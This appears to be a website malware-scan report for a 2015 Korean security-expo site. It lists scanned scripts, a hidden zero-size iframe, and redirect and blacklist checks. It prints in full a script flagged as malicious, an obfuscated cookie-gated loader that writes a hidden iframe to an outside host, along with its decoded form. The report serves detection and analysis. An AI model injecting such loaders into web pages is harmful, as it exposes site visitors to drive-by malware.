Scanned pages/files
Request | Server response | Status |
http://www.seconexpo.com/2015/kor/main/main.asp | 200 OK Content-Length: 24711 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://adcheck.about.co.kr/mad/prd/view?shopid=boannews
<iframe src="http://adcheck.about.co.kr/mad/prd/view?shopid=boannews" scrolling="no" frameborder="0" width="0" height="0">
http://bidetshop.co.kr/common/icon/view.js | 200 OK Content-Length: 529 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
if(document.cookie.indexOf('veatpr')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='veatpr=Yes;path=/;expires='+expires.toGMTString();document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%62%69%64%65%74%73%68%6F%70%2E%63%6F%2E%6B%72%2F%63%6F%6D%6D%6F%6E%2F%69%63%6F%6E%2F%76%69%65%77%2E%68%74%6D%6C%27%20%77%69%64%74%68%3D%27%36%30%27%20%68%65%69%67%68%74%3D%27%31%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E"));}
Decoded script: <iframe src='http://bidetshop.co.kr/common/icon/view.html' width='60' height='1' frameborder='0'></iframe>
Antivirus reports:
http://www.seconexpo.com/2015/kor/main/../js/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/jquery.easing.1.3.js | 200 OK Content-Length: 4986 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/common.js | 200 OK Content-Length: 5259 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/design.js | 200 OK Content-Length: 16035 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/menu.js | 200 OK Content-Length: 1667 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/m_query.js | 200 OK Content-Length: 2135 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/jquery.imageScroller.js | 200 OK Content-Length: 1410 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/slides.jquery.js | 200 OK Content-Length: 14799 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/main_board.js | 200 OK Content-Length: 1768 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/common_movie.js | 200 OK Content-Length: 3240 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com/2015/kor/main/../js/rolling_b.js | 200 OK Content-Length: 6270 Content-Type: application/x-javascript | clean |
http://www.seconexpo.com//adimg.daumcdn.net/rt/roosevelt.js/ | 404 Not Found Content-Length: 5410 Content-Type: text/html | clean |
http://www.seconexpo.com/test404page.js | 404 Not Found Content-Length: 5370 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: seconexpo.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: seconexpo.com
Referer: http://www.google.com/search?q=seconexpo.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=seconexpo.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://seconexpo.com/
Result: seconexpo.com is not infected or malware details are not published yet.